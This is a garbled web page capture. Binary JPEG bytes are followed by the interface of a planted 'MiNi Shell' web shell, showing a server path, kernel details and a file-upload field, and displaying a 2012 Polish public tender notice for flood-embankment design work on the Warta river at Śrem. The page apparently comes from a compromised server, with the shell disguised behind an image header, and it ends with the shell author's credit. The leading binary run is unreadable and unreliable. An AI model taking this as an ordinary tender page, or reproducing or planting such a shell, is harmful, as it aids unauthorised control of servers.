JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/214606-N-2012.html

<p class="kh_header"><b>Poznań: Odbudowy wałów prawostronnych i lewostronnych rz. Warty gm. Śrem - dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 214606 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu , ul. Piekary 17, 60-967 Poznań, woj. wielkopolskie, tel. 061 6475221, faks 061 8525561.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowy wałów prawostronnych i lewostronnych rz. Warty gm. Śrem - dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie przewiduje wykonanie projektu budowlanego i wykonawczego pod nazwą Odbudowy wałów prawostronnych i lewostronnych rz. Warty, gm. Śrem, obejmującej odbudowę wałów przeciwpowodziowych zaliczanych do III klasy technicznej, o łącznej długości 9,891 km wraz z budowlami wałowymi, ozna-czonych na mapach kolorem czerwonym. Przewidywany zakres prac projektowych obejmuje następujące odcinki wałów: wał prawostronny rzeki Warty (Śrem) - 4,5 km, wał prawostronny rzeki Warty (Śrem - przepompownia) - 0,691 km i wał lewostronny rzeki Warty (Śrem - Wójtostwo - Łężek) - 4,7 km.

Przedmiotem odbioru będzie:
1. Projekt budowlany i wykonawczy odbudowy rzeki (wykonany w 7 egz.) obejmujące: wał przeciwpowodziowy wraz z umocnieniami, budowle regulacyjne i przejazdowe, odbudowę ujściowych odcinków dopływów, w oparciu o aktualny pomiar geodezyjny i niezbędne badania geotechniczne i gruntowe, wraz z oceną ekonomiczną przedsięwzięcia i zestawieniem planowanych kosztów inwestycji,
2. Operat wodnoprawny z opisem w języku nietechnicznym, (4 egz.),
3. Przedmiar robót, (4 egz.)
4. Specyfikacja techniczna wykonania i odbioru robót, (4 egz.)
5. Kosztorys inwestorski, (1 egz.)
6. Szczegółowy wykaz obrębami geodezyjnymi właścicieli i posiadaczy gruntów i ich aktualnych adresów z określeniem powierzchni całkowitej działki, powierzchni przewidzianych do wykupów i powierzchni czasowego zajęcia, (4 egz.) 
7. Zgody właścicieli gruntów na realizację inwestycji, wycinkę drzew i krzewów i zgoda na odpłatne przekazanie gruntów zajętych przez wał przeciwpowodziowy i budowle wałowe, (1 egz. - oryginał)
8. Materiały do uzyskania decyzji na wycinkę drzew i krzewów (3 egz.), w rozbiciu na gminy, zawierające: 
- inwentaryzację zadrzewień i krzewów przewidzianych do wycięcia wykonana na mapach ewidencyjnych, 
- zgody właścicieli lub posiadaczy  gruntów na wycinkę drzew i krzewów (kopie zgód - wg pkt 7).
9. Materiały niezbędne do wydania decyzji o środowiskowych uwarunkowaniach inwestycji, (4 egz. w wersji papie-rowej, w tym 1 egz. map i wypisów w oryginale), tj.:
- karta informacyjna przedsięwzięcia o której mowa w art. 3 ust. 1 pkt 5 lit. a-i ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 ze zm.)
- kopie mapy ewidencyjnej (poświadczone przez właściwy organ) obejmujące przewidywany teren, na którym będzie realizowane przedsięwzięcie, oraz obejmującej obszar, na który będzie oddziaływać przedsięwzięcie,
- wypis z ewidencji gruntów (poświadczony przez właściwy organ) obejmujący przewidywany teren, na którym będzie realizowane przedsięwzięcie oraz obejmujący obszar, na który będzie oddziaływać przedsięwzięcie.
10. Raport oddziaływania przedsięwzięcia na środowisko - tylko w przypadku ustanowienia wymogu sporządzenia takiego raportu przez organ administracyjny, (4 egzemplarze). W przypadku braku wymogu wykonania przedmio-towego  raportu cena ofertowa zamówienia będzie pomniejszona o wykazaną w ofercie cenę tego opracowania. 
11. Kopie niżej wymienionych opracowań w wersji elektronicznej, w formacie PDF na nośniku elektronicznym - płycie CD. Nazwy plików nie mogą zawierać polskich znaków i znaków specjalnych nietolerowanych przez dyskowe systemy operacyjne. Wersje opracowań papierowych winny być zeskanowane w całości wraz z podpisami, uzgodnieniami itd., od pierwszej do ostatniej strony. Każde niżej wymienione opracowanie musi zawierać się w oddzielnym pliku, z wyłączeniem map i rysunków stanowiących załączniki do części opisowej, które należy zamieścić na tym nośniku oddzielnie, z zaznaczeniem jakiego opracowania są częścią składową, też w formacie PDF:
- Projekt budowlany i wykonawczy wraz z uzgodnieniami,  
- Operat wodnoprawny z opisem w języku nietechnicznym,
- Przedmiar robót,
- Specyfikacja techniczna wykonania i odbioru robót,
- Szczegółowy wykaz obrębami geodezyjnymi właścicieli i posiadaczy gruntów i ich aktualnych adresów z określeniem powierzchni całkowitej działki, powierzchni przewidzianych do wykupów i powierzchni czaso-wego zajęcia, 
- Zgody właścicieli gruntów na realizację inwestycji, wycinkę drzew i krzewów i zgoda na odpłatne przekazanie gruntów zajętych przez koryto rzeki,
- Materiały do uzyskania decyzji na wycinkę drzew i krzewów,
- Materiały niezbędne do wydania decyzji o środowiskowych uwarunkowaniach inwestycji, 
- Raport oddziaływania przedsięwzięcia na środowisko (opcja - jak wyżej).
Dokumentacja musi spełniać wymagania obowiązujących norm i przepisów prawnych. 
Opracowana ma być zgodne ze sztuką inżynierską, wymogami prawa budowlanego, wodnego, ustawią o ochronie i kształtowaniu środowiska oraz innymi przepisami i normami. w tym z: Rozporządzeniem ministra transportu, budownictwa i gospodarki morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowla-nego (Dz. U. nr 462 z dnia 27 kwietnia 2012 r.) oraz Rozporządzeniem ministra transportu, budownictwa i gospodarki morskiej z dnia 25 kwietnia 2012 r. w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych (Dz. U. nr 463 z dnia 27 kwietnia 2012 r.) 
Przedmiotowa dokumentacja ma pozwolić Inwestorowi na uzyskanie wymaganych decyzji administracyjnych: decyzji o środowiskowych uwarunkowaniach, decyzji wodnoprawnej, decyzji na wycinkę drzew i krzewów, decyzji pozwolenie na budowę oraz realizację inwestycji.
Odbiór końcowy i fakturowanie nastąpi po sprawdzeniu przedmiotu zamówienia i po wykonaniu zaleceń lub usunięciu ewentualnych wad stwierdzonych na posiedzeniu Zespołu Specjalistów zorganizowanym przez Zamawiającego w ter-minie 14 dni od daty przekazania dokumentacji.
Wykonana dokumentacja projektowa będzie przedmiotem oceny zespołu specjalistów (z udziałem projektanta, zainteresowanych stron i instytucji) powołanego przez Inwestora w celu jej sprawdzenia i ustalenia poprawności wykonania dokumentacji. Wnioski z tej oceny będą stanowiły podstawę dla inwestora do żądania usunięcia stwierdzonych wad oraz wykonania zaleceń w ustalonym z Inwestorem terminie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> - nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- doświadczenie w projektowaniu urządzeń wodnych w zakresie budowli przeciwpowodziowych (z wyłączeniem kanałów ulgi) i lub  budowli hydrotechnicznych piętrzących, w rozumieniu prawa wodnego, o łącznej wartości świadczonych usług na kwotę co najmniej 100 000,00 zł. (słownie sto tysięcy złotych); Spełnienie warunków odbywa się poprzez złożenie wraz z ofertą odpowiednio dokumentów, wykazów i oświadczeń potwierdzających postawiony wymóg.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie osobą uprawnioną do wykonywania samodzielnych funkcji w budownictwie - projektowania regulacji wód, urządzeń wodnych, melioracji lub budowli hydrotechnicznych. Spełnienie warunków odbywa się poprzez złożenie wraz z ofertą odpowiednio wykazów i oświadczeń potwierdzających postawiony wymóg.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 180 tys. PLN. zł (słownie: sto osiemdziesiąt tysięcy złotych) i dysponuje środkami finansowymi lub posiada zdolność kredytową w wysokości nie mniejszej niż 100.tys.  zł (słownie: sto tysięcy złotych). Spełnienie warunków odbywa się poprzez złożenie wraz z ofertą odpowiednio dokumentów potwierdzających postawiony wymóg.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie: 
1. Zmiana terminu wykonania umowy (lub etapu) może nastąpić w uzasadnionych przypadkach, których nie można było przewidzieć w chwili zawarcia umowy na podstawie obustronnie podpisanego aneksu przed upływem terminu umownego, a mianowicie:
- istotnej zmiany koncepcji rozwiązań projektowych w wyniku uwarunkowań zewnętrznych.
- braku niezbędnych informacji lub decyzji od innych stron, pomimo zachowania należytej staranności przez Projektanta, dokonującego niezbędnych uzgodnień w zakresie proponowanych lub przyjętych rozwiązań projektowych,
- istotnych utrudnień w pracach polowych niezbędnych do określenia konkretnych rozwiązań technicznych lub z powodu działania siły wyższej, 
- z uzasadnionych przyczyn niezależnych od Projektanta., 
2. harmonogramu realizacji zamówienia i etapów fakturowania, które mogą być przez strony uzgadniane w toku realizacji zamówienia w oparciu o potwierdzenia wielkości środków finansowych otrzymanych przez Zamawiającego zgodnie z zatwierdzonym planem finansowym Zamawiającego. 
3. zmiany obowiązującej stawki podatku VAT od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu, ul. Piekary 17, 61-823 Poznań - pok. 105..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 09:00, miejsce: Siedziba zamawiającego -  pok. 201 - sekretariat Wielkopolskiego Zarządu Melioracji i Urządzeń Wodnych w Poznaniu, ul. Piekary 17,  61-823 Poznań..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com